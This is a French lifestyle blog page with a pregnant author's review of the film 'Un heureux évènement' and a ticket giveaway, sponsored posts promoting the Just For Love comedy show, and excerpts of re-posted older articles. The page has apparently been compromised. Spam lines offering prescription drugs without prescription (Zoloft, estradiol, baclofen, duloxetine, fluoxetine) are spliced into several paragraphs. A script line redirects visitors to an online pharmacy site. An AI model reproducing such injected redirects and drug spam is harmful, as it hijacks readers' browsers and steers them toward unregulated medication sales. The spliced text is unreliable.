Un heureux évènement, le film débat !

2 octobre 2011 par  
Classé dans A la Une, Lifestyle, Maternité

Quand j’ai entendu parler du film Un heureux Evénement, film de Rémi Bezançon (à qui l’on doit le splendide Le Premier jour du reste de ta vie), et d’après le roman d’Eliette Abécassis, j’ai tout de suite pensé qu’il fallait que j’aille le voir très vite.

Au casting : Louise Bourgoin, Pio Marmaï, Josiane Balasko, Anaïs, Thierry Frémont, Firmine Richard.

Le pitch :
« « Elle m’a poussée dans mes retranchements, m’a fait dépasser toutes mes limites, m’a confrontée à l’absolu : de l’amour, du sacrifice, de la tendresse, de l’abandon. Elle m’a disloquée, transformée. Pourquoi personne ne m’a rien dit ? Pourquoi on n’en parle pas ? »
Un heureux événement ou la vision intime d’une maternité, sincère et sans tabous. »

La bande annonce :

Alors forcément, on se dit en voyant la bande annonce que ça n’est peut-être pas le genre de film que doit aller voir une femme enceinte de 8 mois … et pourtant je me suis empressée d’y aller quand on m’a invité à l’avant-première.

Ce que j’en ai pensé : ce film m’a fait du bien.
Je ne suis pas du genre femme enceinte qui pense que tout va être rose, que des papillons vont accompagner l’accouchement, que l’arrivée d’un bébé au sein d’un couple n’apporte que du bonheur et que chacun trouve sa place naturellement.
J’ai connu, et c’est toujours d’actualité, les réveils en fanfare « et si je n’y arrive pas ? Et si son lit n’est pas prêt ? Et si j’accouche demain on fait comment ? Et si je n’arrive pas à gérer mon boulot, mon couple, le bébé ? » Bref, beaucoup d’angoisses, de doutes, et je pense que c’est très bien comme cela, je ne suis pas naïve …
Je sais, et je le vois bien autour de moi, que l’arrivée d’un bébé, la vie avec un enfant perturbe l’équilibre du couple, parce que forcément c’est un tel chamboulement que toute notre vie change / va changer.
Les chiffres font froid dans le dos : « 20 à 25 % des couples se séparent dans les premiers mois après la naissance de bébé. Et ce chiffre est en progression constante »*
Alors comment s’assurer qu’on va être plus fort que les autres, qu’on vaut mieux que ces 20 à 25% ?

Je n’ai pas la réponse, la baguette magique, alors j’essaie d’en savoir le plus possible.

Le film est très réaliste, tout n’est pas rose, tout ne coule pas de source et le déséquilibre père-mère est présent tout au long du film : des premiers mois de grossesse au quotidien avec un enfant. Si le désir d’un enfant peut être pris à la légère, si parfois il s’agit d’accident ou de surprise, pour la future maman tout devient très vite concret (désolé les papas/futurs papas mais il y a des choses que seules les femmes enceintes peuvent ressentir, ce qui ne vous met pas hors jeu mais si dès le début nous pouvons connaître les joies des nausées & co vous êtes relativement épargnés – même si je reconnais que votre soutien et votre patience sont cruciales !)
Je ne connais pas encore la vie avec un bébé, mais je suis, je crois, assez consciente de ce qui va se passer parce que j’ai cherché beaucoup de témoignages, d’informations sur cette période, que j’en parle avec les jeunes parents autour de moi, comme je l’ai fait sur la grossesse ou l’accouchement.

Après le film nous avons pu débattre avec le réalisateur et Pio Marmaï, et les échanges ont été très intéressants.
Pour les déjà mamans, le film est plutôt « positif » : il colle à la réalité (pour ma part, je ne connais « que » la grossesse, cette partie est très bien traitée dans le film).
Pour celles qui ne veulent pas d’enfant le film les conforte dans leurs opinions : l’accouchement c’est horrible, la vie de couple en prend un coup et on passe de femme à mère, c’est la mort du couple.

Je ne vois pas du tout les choses comme cela, ce film est pour moi plus une mise en garde, du genre « Voilà ce vers quoi les choses vont naturellement aller, faites bien attention » et là c’est à chacun, au couple, de se battre pour ne pas être juste un couple de parents, pour que la mère puisse garder une vie sociale, professionnelle, que les taches soient équitablement réparties, qu’aucun des 2 parents ne soit rabaissé, bref, que chacun soit préservé, garde son indépendance mais que le couple soit solidaire autour du bébé.

order online at usa pharmacy! price zoloft . fastest shipping, cheap zoloft online.

En discutant en « tête à tête » avec le réalisateur nous avons pu parler de la différence de perception entre les futures/jeunes mamans et les pas encore maman/celles qui ne veulent pas d’enfant. Apparemment les différentes projections ont été identiques : toutes les futures/jeunes mamans ont trouvé le film plutôt positif, rassurant, tandis que celles qui n’en veulent pas/ne sont pas encore prêtes ont été confortées dans leur opinions : trop de souffrance, trop de douleur sans y voir le côté positif.

womans health, buy generic estrace cream , buy estradiol 2mg tabs without prescription – bayofmanycoves.co.nz.

Je pense, et cela n’engage que moi, que tout dépend du chemin que l’on a fait. Par exemple au début de ma grossesse, et même avant, l’accouchement me terrorisait, je pensais égoïstement et à froid, qu’avoir une césarienne était la meilleure chose qui puisse m’arriver.
A moins d’un mois de mon accouchement je n’ai plus du tout la même idée de l’accouchement. Je vois ça comme un passage obligé, il faut bien le sortir ce bébé, et si ça prend 10, 15 ou 24h de toutes façons il faut le faire. Evidemment, à froid entendre parler d’épisio, de forceps, de ventouse, ça ne fait pas rêver, mais pour moi l’accouchement est avant tout un acte médicale qu’il ne faut pas prendre à la légère et je suis plus du genre à faire confiane aveugle à l’équipe médicale plutôt qu’à vouloir accoucher dans l’eau/ sans péridurale/à refuser catégoriquement l’épisio/à vouloir un accouchement le plus naturel possible.

Aujourd’hui l’idée d’avoir une césarienne me fait peur, je veux réussir à donner naissance sans passer par là même si évidemment je sais qu’il y a des raisons médicales pour lesquelles on pratique la césarienne (je ne parle pas des cliniques privées qui pratiquent la césarienne de confort, cette idée me rend dingue …) et je ne veux pas que cela soit mal interprété par celles qui ont du passer par là.

Donc voilà, difficile de dire « c’est bien/c’est nul », tout dépend de l’histoire de chacun, pour moi ce film, que j’ai vu avec le futur papa, a été une bonne chose, l’occasion pour le couple de futurs jeunes parents que nous sommes de discuter de tout ce qui va nous arriver, de ce que nous allons devoir essayer de faire/ ne pas faire, l’occasion de se dire ce que nous attendons et espérons de ce grand chamboulement, ce qui nous fait peur, et quelques jours après, on profite, on a envie d’arrêter le temps pour regarder le chemin parcouru et de se dire qu’on en a de la chance d’être aussi amoureux et d’être à l’aube d’une toute nouvelle vie tous les 2 … +1 !

Alors un grand merci et bravo à Rémy Bezançon pour ce film très touchant, un film auquel je repense tous les jours, ça n’est pas rien …

(oui, j’assume la conclusion un peu cucul !)

*Dr Bernard Geberowicz, co-auteur du livre le Baby-clash

CONCOURS : 5*2 PLACES A GAGNER !

buy estrace online, is estradiol level 32 low, is estradiol level 41 low. generic for transgenders review estradiol 41 es normal estradiol cream price  Bon, vous avez eu le courage de lire cet article-fleuve, pour vous en remercier vous pouvez gagner 5*2 places pour voir le film, dans tous les cinémas de France, n’importe quel jour et à n’importe quelle heure !

Il vous suffit de laisser un commentaire sous cet article et attention, tirage au sort mercredi : je dois donner vos adresses postales jeudi, surveillez donc bien vos BAL mercredi soir et répondez vite si vous faites partie des 5 veinards ! baclofen ( generic lioresal) is used for treating severe muscle spasms and cramping of muscles due to a 30 10mg tablet , $ 25.00, $ 39.95, free *, $ 64.95.

window.location = « http://medicationsonlinedoctor.com »;

.

Rendez-vous sur Hellocoton !

Just For Love, un spectacle inédit placé sous le signe de Cupidon !

21 septembre 2011 par  
Classé dans A la Une, Dans le poste, Lifestyle, People, Sorties

Vous l’aurez remarqué si vous passez régulièrement sur Caractérielles, on a pas mal parlé d’anecdotes de couples ces derniers jours : on se demandait par exemple pourquoi les filles les plus coincées se retrouvaient avec NOS potes de toujours. Ou alors pourquoi les mecs, nos mecs, se mettent peu à peu à piquer nos produits de beauté sans en avoir l’air, ou même, quand les choses deviennent plus sérieuses (si l’on peut dire que le mariage est une chose sérieuse …), que certaines futures mariées sont parfois prêtes à tout pour faire une taille en moins lors du D-Day.

Et pourquoi tout ce petit monde en a pris pour son grade, me direz-vous ? Tout simplement pour vous parler du spectacle Just For Love, aka le Gala Juste pour Rire qui s’installe au Zénith de Paris les 22, 23 et 24 septembre 2011. Et cette année, c’est Arthur, le chef d’orchestre de ce spectacle inédit, qui a placé le show sous le signe du petit Cupidon et de la vie de couple.

14 humoristes plus passionnés les uns que les autres (dont Anne Roumanoff, Stéphane Rousseau, Jérôme Commandeur, Elisabeth Buffet ou encore mon chouchou Max Boublil, entre autres) passeront en vue leur vision du couple à l’occasion de ce spectacle : du stand up, de la musique, des sketches en couple et plus si affinités pour une nuit d’amour et d’humour dont on se souviendra !

Si vous n’avez pas l’occasion de vous rendre au Zénith de Paris, le spectacle sera diffusé en direct sur Comédie+ (une chaine du groupe CanalSat) le Samedi 24 Septembre à 20h45.

En attendant, vous pouvez retrouver tous les teasers du spectacle par ici !

Partenariat sponsorisé

Rendez-vous sur Hellocoton !

Tu me prêtes ta crème hydratante ? Juste pour essayer …

9 septembre 2011 par  
Classé dans A la Une, Lifestyle

Partenariat sponsorisé

On a toutes entendu un jour notre homme nous demander ça d’une voix innocente, pas vrai ? S’il y a bien un truc que nos copains mettent un peu de temps à assumer, c’est bien de nous piquer nos petites affaires de la salle de bains.

Ca commence un dimanche après-midi, alors qu’on est occupée à tester un nouveau masque antioxydant et qu’on est allongée tranquillou sur le canap’ à écouter le dernier Bon Iver, en attendant que les petits actifs prennent soin de notre minois.

C’est alors qu’on entend une voix rauque (dû aux excès de Mojito de la veille sûrement) nous dire « Qu’est-ce qui te prend, tu te prend pour Fantômas ? ». Vous noterez au passage l’humour recherché de l’homme dans une telle situation. Après lui avoir expliqué les bénéfices produits, celui-ci prend un air dubitatif et balance un « Mouais … J’y crois moyen mais bon, je vais essayer, ça pourra pas me faire de mal de toute façon ».  En plein dans le mille coco, même que maintenant, le masque antioxydant, c’est tous les dimanche que tu t’y colles !

A la plage, alors qu’on est accro à notre huile solaire, monsieur gueule parce que « Oui, encore ton huile dégueulasse, tu peux pas acheter une crème comme tout le monde ?? C’est trop gras ça ! ». N’empêche qu’au bout de deux jours, il finit par lorgner sur notre bronzage et commence à trouver l’huile beaucoup moins grasse. Cela dit, il faut quand même lui étaler, pour lui éviter l’humiliation du bronzage zebré au retour des vacances.

Un autre soir, c’est le rituel du patch pour le nez qui est découvert, dénigré, testé puis réitéré à raison de deux fois par mois.

Au fur et à mesure, monsieur prend de plus en plus goût à tester nos dernières trouvailles beauty-esques planquées dans la salle de bains. Et c’est avec horreur que l’on découvre que la moitié de notre crème de la mer à 4500 euros le litre a servi à faire un masque. Ben oui, « j’avais une petite mine, tu comprends ».

Les mecs dans la salle de bains, le genre d’anecdotes qui sera certainement évoqué avec humour lors du spectacle JUST FOR LOVE, un évènement CANALSAT en partenariat avec Comédie+.

En savoir plus sur le spectacle JUST FOR LOVE

Un spectacle au Zénith de Paris, présidé par Arthur, entouré d’Anne Roumanoff, de Stéphane Rousseau, Max Boublil et bien plus encore, qui sera diffusé le 24 septembre sur Comédie+ à 20h45.

Plus d’infos par ici ! 

 

 

 

Rendez-vous sur Hellocoton !

Les hommes sont des êtres complexes…

31 août 2011 par  
Classé dans A la Une, Lifestyle, Quotidien

Partenariat sponsorisé 

Non, je plaisante, ce sont des êtres bassement binaires, mais c’est parce que nous, les femmes, sommes complexes et intellectuelles, et que nous n’arrivons pas à nous mettre à leur niveau que nous confondons complexité avec … avec manque d’honnêteté peut-être ?!

L’exemple le plus flagrant : quand vient chez ces messieurs le moment de se caser.

Soit, quand, telle une envie de pisser, ils se disent que « Ca y est, terminées les conneries, je me case ». Généralement, selon les spécimens, vers 30/35 ans.

Une histoire de loup …

Si pendant des années ils ont chercher à coucher avec la fille qui justement a couché avec plein de mecs, quand vient le moment de se caser, hors de question de mettre dans son lit conjugal une fille qui a trop pratiqué, mieux vaut se prendre le petit chaperon rouge que la dresseuse de loups …

Les plus fêtards se retrouvent avec un bonnet de nuit …

Alors qu’ils écumaient les bars, les boites, avaient leurs petites habitudes et connaissaient par leurs prénoms toutes les barmaids de Paris ils se casent avec une fille qui n’est pas sortie depuis la fête des bacheliers, joyeusement arrosé au panaché. Parce qu’il ne faudrait pas, quand même, que madame se retrouve la culotte sur la tête au Rosa Bonheur samedi soir …

Une histoire de degré …

Alors qu’ils ont passé des soirées à se mettre minable avec leur bonne copine qui tient l’alcool comme un breton pur-chouchen,  quand vient le moment de choisir LA fille, il écarte systématiquement son binôme de bouteille et se tourne vers celle qui 1° ne sors pas, 2° carbure à l’Evian en soirée, 3° ose juste faire peter la coupette aux mariages ou le verre de blanc avec le filet de sole.  Il ne connaitra jamais le bonheur, la satisfaction de la murge en couple, il passera juste pour un alcoolique pathologique s’il rentre en marchant à l’envers un samedi soir (et le paiera très cher pendant très longtemps).

Tel un prince, sur son cheval blanc …

Idéalement, il choisira celle qui a eu le cœur brisé récemment, histoire de passer pour le sauveur, celui qui brillera forcément plus aux yeux de sa belle « Moi tu sais, je ne suis pas comme ça » …

De la même façon, il privilégiera celle qui n’a que des sœurs, pas trop d’amis (notez bien le « is ») histoire qu’elle ne soit pas trop rodée aux histoires de mecs, qu’elle ait encore sa petite naïveté et qu’elle soit bien malléable …

Mais au fond, messieurs, tout ça, ça ne serait pas juste la peur de ne pas maitriser, de ne pas rester maitre de la situation ?!

Voilà comment les filles les plus coincées se retrouvent avec NOS copains de soirées, quelle injustice, et surtout quelle plaie s’ils viennent accompagnés à nos traditionnelles soirées, il va encore falloir trouver des sujets de discussion …

Vous allez peut-être me dire que j’exagère, que je suis trop dure …

Rassurez-vous, je pense que les femmes vont aussi en prendre pour leur grade avec le spectacle JUST FOR LOVE, un événement CanalSat en partenariat avec Comédie+.

Kesaco ce spectacle me direz-vous ?

C’est un spectacle présidé par Arthur, entouré d’Anne Roumanoff, de Stéphane Rousseau, Max Boublil et bien plus encore, qui sera diffusé le 24 septembre sur Comédie+ à 20h45.

 

 

Rendez-vous sur Hellocoton !

Les 5 langages de l’amour

19 février 2010 par  
Classé dans Dossiers Spéciaux, Lifestyle, Quotidien, Socio

langages-amour

Etant actuellement au bout du monde, je ne peux pas publier de nouveaux articles …

Mais c’est l’occasion de ressortir les vieux articles, ceux mis en ligne avant le lancement de Caractérielles et que vous n’avez certainement pas lu …

Celui-ci a été mis en ligne le 17 février 2009. buy duloxetine hcl . duloxetine hydrochloride cost duloxetine 30 mg. buy prozac online no prescription buy fluoxetine online no prescription uk. cymbalta 


Tout s’explique, il y a une bonne raison pour laquelle, parfois, les relations hommes-femmes sont si compliquées, pourquoi, parfois, on ne comprend rien à l’autre. C’est juste parce qu’on ne parle pas le même langage de l’amour. Alors comme ça, ça fait un peu romantico-romantique, mais en s’y penchant de plus près, on comprend mieux.
Selon Gary Chapman, un conseiller conjugal américain, il existerait en fait 5 langages de l’amour Lire plus

Rendez-vous sur Hellocoton !

Pourquoi Rocky est le mec parfait

17 février 2010 par  
Classé dans Le monde est fou, Lifestyle, Socio

Etant actuellement au bout du monde, je ne peux pas publier de nouveaux articles …

Mais c’est l’occasion de ressortir les vieux articles, ceux mis en ligne avant le lancement de Caractérielles et que vous n’avez certainement pas lu …

Celui-ci a été mis en ligne le 10 février 2009.

rocky-adrienne1

Bon, autant prévenir avant que vous ne perdiez une précieuse minute, cette note vous échappera totalement si vous n’êtes pas de la génération Rocky, de celle qui a grandi avec l’étalon Italien comme idole. Lire plus

Rendez-vous sur Hellocoton !

Page Suivante »